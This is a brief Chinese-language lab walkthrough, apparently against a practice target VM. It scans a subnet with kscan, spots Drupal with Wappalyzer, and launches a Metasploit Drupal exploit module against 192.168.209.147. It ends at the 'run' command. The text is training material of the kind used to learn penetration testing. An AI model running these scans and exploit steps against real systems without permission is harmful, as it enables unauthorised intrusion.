一、信息收集
(1)、获取本机ip
ip a
(2)、获取同段靶机ip
这里利用的是kscan工具,
查看当前路径
pwd
已经我们的kscan工具在桌面,所以切换路径到desktop
cd ~/Desktop
查看当前文件路径下的文件
ls
执行Linux命令,这里采用./的方法进行执行。
./kscan_linux_amd64 -t 192.168.209.0/24
发现靶机IP为:192.168.209.147,一般默认端口为80端口
二、漏洞挖掘
(1)、使用wappalyzer工具
192.168.209.147
我们可以看出这个网站使用了drupal系统框架
(2)、使用msf经验知识库
[1]、进入msf终端
[2]、寻找drupal框架漏洞
开始查看历史漏洞
search drupal
use 1
show options
set RHOSTS 192.168.209.147
run